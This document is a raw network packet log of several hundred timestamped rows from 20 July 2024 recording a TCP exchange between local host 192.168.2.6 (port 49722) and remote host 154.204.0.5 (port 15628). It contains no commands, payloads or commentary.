Jul 20, 2024 16:31:21.366976023 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.367392063 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.367594957 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.378480911 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.378653049 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.378789902 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.385776997 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.388704062 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.397147894 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.400630951 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.425481081 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.437669039 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.437813044 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.454855919 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.454930067 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.462718964 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.462850094 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.470036030 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.470097065 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.476332903 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.476396084 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.484386921 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.484458923 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.494595051 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.494657040 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.501301050 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.501364946 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.507688046 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.507742882 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.514856100 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.514914989 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.519836903 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.519893885 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.524859905 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.524915934 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.532696009 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.532752991 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.537822962 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.537872076 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.544461966 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.544528961 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.552531958 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.552593946 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.558634996 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.558686972 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.563730001 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.563781977 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.570306063 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.570358038 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.577828884 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.577886105 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.583235025 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.583287001 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.593547106 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.593601942 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.599438906 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.599508047 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.604558945 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.604609966 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.609863043 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.609914064 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.614878893 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.615775108 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.620774031 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.620848894 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.625700951 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.625766039 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.630918026 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.630968094 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.636212111 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.636266947 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.641273022 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.641323090 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.646631956 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.646682978 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.652112007 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.655777931 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.660825014 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.660876989 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.666019917 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.668477058 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.674375057 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.674427032 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.679871082 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.679964066 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.686481953 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.686548948 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.691920996 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.691970110 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.697287083 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.697339058 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.702502966 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.702554941 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.709311008 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.709367037 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.743438005 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.743505001 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.774925947 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.781877995 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.781955004 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.783008099 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.783080101 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.787393093 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.787446022 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.788024902 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.788074017 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.792396069 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.792448997 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.793401003 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.793451071 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.797384977 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.797440052 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.799846888 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.799897909 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.803025007 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.803072929 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.805713892 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.805768967 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.810466051 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.810508966 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.811105013 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.811148882 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.816042900 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.816091061 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.823601007 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.823653936 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.829396963 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.829447985 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.834672928 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.834723949 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.839719057 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.839771032 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.845385075 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.845428944 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.851362944 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.851412058 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.857810020 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.857861042 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.865387917 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.865447998 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.871017933 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.871081114 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.879371881 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.879431963 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.884438992 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.884490967 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.889880896 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.889930964 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.895030022 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.895083904 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.900527000 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.900578022 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.905558109 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.905618906 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.910847902 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.910893917 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.918632030 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.918684006 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.923578978 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.923633099 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.929519892 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.929567099 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.935636997 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.935693979 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.940615892 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.940670967 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.945919991 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.945970058 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.951136112 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.951185942 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.956842899 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.956897974 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.962759972 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.962814093 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.968046904 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.968100071 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.973056078 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.973105907 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.979216099 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.979274035 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.984260082 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.984313965 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.990355015 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.990411043 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.995706081 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.995769978 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.001087904 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.002629995 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.007863998 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.007915020 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.013106108 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.013164997 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.018029928 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.018085003 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.022979021 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.023031950 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.028953075 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.029010057 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.033961058 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.034010887 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.038924932 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.038986921 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.044091940 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.044147968 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.049820900 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.049874067 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.055927038 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.055979967 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.061209917 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.061263084 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.066298962 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.066349983 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.071361065 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.071423054 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.076513052 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.076572895 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.081748962 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.081799984 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.087588072 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.087642908 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.097474098 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.097526073 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.102622032 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.102679014 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.107512951 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.107573032 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.132311106 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.132369995 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.138272047 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.138339043 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.143325090 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.143378019 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.148796082 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.148859024 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.153851986 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.153904915 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.159791946 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.159847021 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.164874077 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.164930105 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.170100927 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.170150042 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.175672054 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.175719976 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.183074951 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.183130980 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.188668013 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.188726902 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.193598032 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.193644047 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.198695898 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.198762894 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.208003044 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.208054066 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.217328072 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.217396021 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.222750902 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.222810984 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.227977991 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.228038073 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.233395100 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.233452082 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.238367081 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.238420963 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.243568897 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.243623972 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.248580933 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.248683929 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.253842115 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.253917933 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.258948088 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.259033918 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.263915062 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.263988972 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.268918991 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.268979073 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.273992062 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.274086952 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.279000044 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.279058933 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.284593105 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.284681082 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.289674044 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.289731979 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.294691086 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.294770002 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.299770117 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.299832106 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.304794073 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.304886103 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.310741901 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.310812950 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.316001892 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.316062927 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.321922064 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.321985006 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.326961994 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.333435059 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.346180916 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.346652031 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.352211952 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.352507114 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.360583067 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.360692024 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.371310949 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.371568918 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.378048897 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.378140926 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.384517908 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.384644985 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.389887094 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.389981985 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.399645090 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.399821997 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.408941031 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.409080982 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.416285038 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.416423082 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.422190905 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.422317982 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.429980040 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.430078983 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.435127020 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.435281992 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:22.440316916 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:22.440505028 CEST	49722	15628	192.168.2.6	154.204.0.5
